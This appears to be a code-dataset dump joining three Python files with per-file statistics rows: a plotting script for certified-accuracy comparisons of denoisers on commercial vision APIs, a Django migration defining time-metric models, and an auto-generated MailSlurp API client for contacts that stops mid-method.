methods=clarifai_api_smooth_resnet34, label='Stab+MSE on Resnet34',
methods_base=clarifai_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/clarifai/denoiser_finetune_smooth_res50_vs_denoiser_mse", '', 0.6,
methods=clarifai_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=clarifai_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/smooth_vs_clf_resnet18", '', 0.6,
methods=azure_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=azure_api_clf_resnet18, label_base="Clf+MSE on ResNet18")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/smooth_vs_clf_resnet34", '', 0.6,
methods=azure_api_smooth_resnet34, label='Stab+MSE on ResNet34',
methods_base=azure_api_clf_resnet34, label_base="Clf+MSE on ResNet34")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/smooth_vs_clf_resnet50", '', 0.6,
methods=azure_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=azure_api_clf_resnet50, label_base="Clf+MSE on ResNet50")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/google/smooth_vs_clf_resnet18", '', 0.6,
methods=google_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=google_api_clf_resnet18, label_base="Clf+MSE on ResNet18")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/google/smooth_vs_clf_resnet34", '', 0.6,
methods=google_api_smooth_resnet34, label='Stab+MSE on ResNet34',
methods_base=google_api_clf_resnet34, label_base="Clf+MSE on ResNet34")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/google/smooth_vs_clf_resnet50", '', 0.6,
methods=google_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=google_api_clf_resnet50, label_base="Clf+MSE on ResNet50")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/aws/smooth_vs_clf_resnet18", '', 0.6,
methods=aws_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=aws_api_clf_resnet18, label_base="Clf+MSE on ResNet18")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/aws/smooth_vs_clf_resnet34", '', 0.6,
methods=aws_api_smooth_resnet34, label='Stab+MSE on ResNet34',
methods_base=aws_api_clf_resnet34, label_base="Clf+MSE on ResNet34")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/aws/smooth_vs_clf_resnet50", '', 0.6,
methods=aws_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=aws_api_clf_resnet50, label_base="Clf+MSE on ResNet50")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/clarifai/smooth_vs_clf_resnet18", '', 0.6,
methods=clarifai_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=clarifai_api_clf_resnet18, label_base="Clf+MSE on ResNet18")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/clarifai/smooth_vs_clf_resnet34", '', 0.6,
methods=clarifai_api_smooth_resnet34, label='Stab+MSE on ResNet34',
methods_base=clarifai_api_clf_resnet34, label_base="Clf+MSE on ResNet34")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/clarifai/smooth_vs_clf_resnet50", '', 0.6,
methods=clarifai_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=clarifai_api_clf_resnet50, label_base="Clf+MSE on ResNet50")
azure_api_smooth_total = azure_api_smooth_resnet18 + azure_api_smooth_resnet34 + azure_api_smooth_resnet50
clarifai_api_smooth_total = clarifai_api_smooth_resnet18 + clarifai_api_smooth_resnet34 + clarifai_api_smooth_resnet50
google_api_smooth_total = google_api_smooth_resnet18 + google_api_smooth_resnet34 + google_api_smooth_resnet50
aws_api_smooth_total = aws_api_smooth_resnet18 + aws_api_smooth_resnet34 + aws_api_smooth_resnet50
plot_certified_accuracy_per_sigma_against_baseline_finetune(
"analysis/plots/vision_api/azure/total_comparison", '', 0.6,
methods=azure_api_mse, label="MSE",
methods_finetune=azure_api_smooth_total, label_finetune="Stab+MSE best",
methods_base=azure_api_no_noise, label_base="No Denoiser")
plot_certified_accuracy_per_sigma_against_baseline_finetune(
"analysis/plots/vision_api/google/total_comparison", '', 0.6,
methods=google_api_mse, label="MSE",
methods_finetune=google_api_smooth_total, label_finetune="Stab+MSE best",
methods_base=google_api_no_noise, label_base="No Denoiser")
plot_certified_accuracy_per_sigma_against_baseline_finetune(
"analysis/plots/vision_api/aws/total_comparison", '', 0.6,
methods=aws_api_mse, label="MSE",
methods_finetune=aws_api_smooth_total, label_finetune="Stab+MSE best",
methods_base=aws_api_no_noise, label_base="No Denoiser")
plot_certified_accuracy_per_sigma_against_baseline_finetune(
"analysis/plots/vision_api/clarifai/total_comparison", '', 0.6,
methods=clarifai_api_mse, label="MSE",
methods_finetune=clarifai_api_smooth_total, label_finetune="Stab+MSE best",
methods_base=clarifai_api_no_noise, label_base="No Denoiser")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/1k_vs_100", '', 0.6,
methods=azure_api_mse_1k, label='MSE with 1k',
methods_base=azure_api_mse, label_base="MSE with 100")
########################################################################################
# Latex
for arch in imagenet_archs:
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/fullAccess_imagenet_certified_outer_envelop_{}_denoisers".format(arch), 0.25, 1.5, 0.25,
imagenet_results[arch].all_imagenet_stability_obj_N10000[arch]
)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/queryAccess_imagenet_certified_outer_envelop_{}_denoisers".format(arch), 0.25, 1.5, 0.25,
sum([imagenet_results[arch].all_imagenet_stability_obj_N10000[b] for b in set(imagenet_archs) - set([arch])], [])
)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/imagenet_certified_outer_envelop_{}_no_denoisers".format(arch), 0.25, 1.5, 0.25,
imagenet_results[arch].imagenet_no_denoiser_N10000)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/imagenet_certified_outer_envelop_{}_whitebox".format(arch), 0.25, 1.5, 0.25,
imagenet_results[arch].cohen_training_N10000)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/cifar10_certified_outer_envelop_no_denoisers", 0.25, 1.5, 0.25,
cifar_no_denoiser_N10000)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/cifar10_certified_outer_envelop_whitebox", 0.25, 1.5, 0.25,
all_cifar_cohen_N10000)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/queryAccess_cifar10_certified_outer_envelop", 0.25, 1.5, 0.25,
all_exp_resnet110_queryAccess_cifar10_stability)
latex_table_certified_accuracy_upper_envelope(
"analysis/latex/fullAccess_cifar10_certified_outer_envelop", 0.25, 1.5, 0.25,
all_exp_resnet110_fullAccess_cifar10_stability)
| 58.58631 | 227 | 0.683211 | 7,704 | 59,055 | 4.864486 | 0.037643 | 0.028178 | 0.021854 | 0.009766 | 0.938014 | 0.919655 | 0.894626 | 0.88043 | 0.858123 | 0.825248 | 0 | 0.065321 | 0.177716 | 59,055 | 1,007 | 228 | 58.644489 | 0.706425 | 0.01353 | 0 | 0.504751 | 0 | 0.055819 | 0.298465 | 0.232218 | 0.001188 | 0 | 0 | 0 | 0.001188 | 1 | 0.019002 | false | 0 | 0.010689 | 0.002375 | 0.042755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9bcc13bcb586b3236b3f09361fa9a17cd2cb00c | 6,997 | py | Python | time_metrics/migrations/0001_initial.py | wallstreetweb/django-time-metrics | 02196d4ab3b49186a2ff228545d290859a742a31 | [
"MIT"
] | null | null | null | time_metrics/migrations/0001_initial.py | wallstreetweb/django-time-metrics | 02196d4ab3b49186a2ff228545d290859a742a31 | [
"MIT"
] | null | null | null | time_metrics/migrations/0001_initial.py | wallstreetweb/django-time-metrics | 02196d4ab3b49186a2ff228545d290859a742a31 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-21 16:23
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('sites', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DayMetric',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=0)),
('date_up', models.DateField(default=datetime.date.today)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
options={
'verbose_name': 'day metric',
'verbose_name_plural': 'day metrics',
},
),
migrations.CreateModel(
name='Metric',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=90)),
('description', models.TextField(blank=True, null=True)),
('slug', models.SlugField(max_length=100, unique=True)),
],
options={
'verbose_name': 'metric',
'verbose_name_plural': 'metrics',
},
),
migrations.CreateModel(
name='MetricItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=0)),
('date_up', models.DateField(default=datetime.date.today)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'metric item',
'verbose_name_plural': 'metric items',
},
),
migrations.CreateModel(
name='MonthMetric',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=0)),
('date_up', models.DateField(default=datetime.date.today)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'month metric',
'verbose_name_plural': 'month metrics',
},
),
migrations.CreateModel(
name='QuarterMetric',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=0)),
('date_up', models.DateField(default=datetime.date.today)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'querter metric',
'verbose_name_plural': 'quarter metrics',
},
),
migrations.CreateModel(
name='WeekMetric',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=0)),
('date_up', models.DateField(default=datetime.date.today)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'week metric',
'verbose_name_plural': 'week metrics',
},
),
migrations.CreateModel(
name='YearMetric',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=0)),
('date_up', models.DateField(default=datetime.date.today)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('metric', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'year metric',
'verbose_name_plural': 'year metrics',
},
),
migrations.AddField(
model_name='daymetric',
name='metric',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='time_metrics.Metric'),
),
migrations.AddField(
model_name='daymetric',
name='site',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site'),
),
]
| 49.274648 | 147 | 0.583965 | 672 | 6,997 | 5.927083 | 0.159226 | 0.06352 | 0.066784 | 0.104946 | 0.727843 | 0.727843 | 0.707758 | 0.707758 | 0.707758 | 0.681145 | 0 | 0.006895 | 0.274546 | 6,997 | 141 | 148 | 49.624113 | 0.777778 | 0.009576 | 0 | 0.616541 | 1 | 0 | 0.169193 | 0.024975 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045113 | 0 | 0.075188 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9f69a8e9acd1db764be11e30be23d0e73ba21bc | 31,083 | py | Python | mailslurp_client/api/contact_controller_api.py | mailslurp/mailslurp-client-python | a1e9fdc6eb06e192909fd57a64813beb32419594 | [
"MIT"
] | 6 | 2020-04-30T07:47:42.000Z | 2022-03-24T20:58:58.000Z | mailslurp_client/api/contact_controller_api.py | mailslurp/mailslurp-client-python | a1e9fdc6eb06e192909fd57a64813beb32419594 | [
"MIT"
] | 1 | 2020-09-20T19:58:21.000Z | 2020-11-29T16:49:19.000Z | mailslurp_client/api/contact_controller_api.py | mailslurp/mailslurp-client-python | a1e9fdc6eb06e192909fd57a64813beb32419594 | [
"MIT"
] | 1 | 2019-08-09T14:55:50.000Z | 2019-08-09T14:55:50.000Z | # coding: utf-8
"""
MailSlurp API
MailSlurp is an API for sending and receiving emails from dynamically allocated email addresses. It's designed for developers and QA teams to test applications, process inbound emails, send templated notifications, attachments, and more. ## Resources - [Homepage](https://www.mailslurp.com) - Get an [API KEY](https://app.mailslurp.com/sign-up/) - Generated [SDK Clients](https://www.mailslurp.com/docs/) - [Examples](https://github.com/mailslurp/examples) repository # noqa: E501
The version of the OpenAPI document: 6.5.2
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from mailslurp_client.api_client import ApiClient
from mailslurp_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ContactControllerApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_contact(self, create_contact_options, **kwargs): # noqa: E501
"""Create a contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact(create_contact_options, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateContactOptions create_contact_options: createContactOptions (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ContactDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_contact_with_http_info(create_contact_options, **kwargs) # noqa: E501
def create_contact_with_http_info(self, create_contact_options, **kwargs): # noqa: E501
"""Create a contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact_with_http_info(create_contact_options, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CreateContactOptions create_contact_options: createContactOptions (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ContactDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'create_contact_options'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_contact" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'create_contact_options' is set
if self.api_client.client_side_validation and ('create_contact_options' not in local_var_params or # noqa: E501
local_var_params['create_contact_options'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `create_contact_options` when calling `create_contact`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_contact_options' in local_var_params:
body_params = local_var_params['create_contact_options']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ContactDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_contact(self, contact_id, **kwargs): # noqa: E501
"""Delete contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_contact_with_http_info(contact_id, **kwargs) # noqa: E501
def delete_contact_with_http_info(self, contact_id, **kwargs): # noqa: E501
"""Delete contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact_with_http_info(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'contact_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contact" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'contact_id' is set
if self.api_client.client_side_validation and ('contact_id' not in local_var_params or # noqa: E501
local_var_params['contact_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `contact_id` when calling `delete_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'contact_id' in local_var_params:
path_params['contactId'] = local_var_params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/{contactId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_contacts(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_contacts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PageContactProjection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_all_contacts_with_http_info(**kwargs) # noqa: E501
def get_all_contacts_with_http_info(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_contacts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param datetime before: Filter by created at before the given timestamp
:param int page: Optional page index in list pagination
:param datetime since: Filter by created at after the given timestamp
:param int size: Optional page size in list pagination
:param str sort: Optional createdAt sort direction ASC or DESC
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PageContactProjection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'before',
'page',
'since',
'size',
'sort'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_contacts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'before' in local_var_params and local_var_params['before'] is not None: # noqa: E501
query_params.append(('before', local_var_params['before'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'since' in local_var_params and local_var_params['since'] is not None: # noqa: E501
query_params.append(('since', local_var_params['since'])) # noqa: E501
if 'size' in local_var_params and local_var_params['size'] is not None: # noqa: E501
query_params.append(('size', local_var_params['size'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/paginated', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageContactProjection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contact(self, contact_id, **kwargs): # noqa: E501
"""Get contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ContactDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_contact_with_http_info(contact_id, **kwargs) # noqa: E501
def get_contact_with_http_info(self, contact_id, **kwargs): # noqa: E501
"""Get contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_with_http_info(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ContactDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'contact_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contact" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'contact_id' is set
if self.api_client.client_side_validation and ('contact_id' not in local_var_params or # noqa: E501
local_var_params['contact_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `contact_id` when calling `get_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'contact_id' in local_var_params:
path_params['contactId'] = local_var_params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/{contactId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ContactDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contact_v_card(self, contact_id, **kwargs): # noqa: E501
"""Get contact vCard vcf file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_v_card(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_contact_v_card_with_http_info(contact_id, **kwargs) # noqa: E501
def get_contact_v_card_with_http_info(self, contact_id, **kwargs): # noqa: E501
"""Get contact vCard vcf file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_v_card_with_http_info(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'contact_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contact_v_card" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'contact_id' is set
if self.api_client.client_side_validation and ('contact_id' not in local_var_params or # noqa: E501
local_var_params['contact_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `contact_id` when calling `get_contact_v_card`") # noqa: E501
collection_formats = {}
path_params = {}
if 'contact_id' in local_var_params:
path_params['contactId'] = local_var_params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/{contactId}/download', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
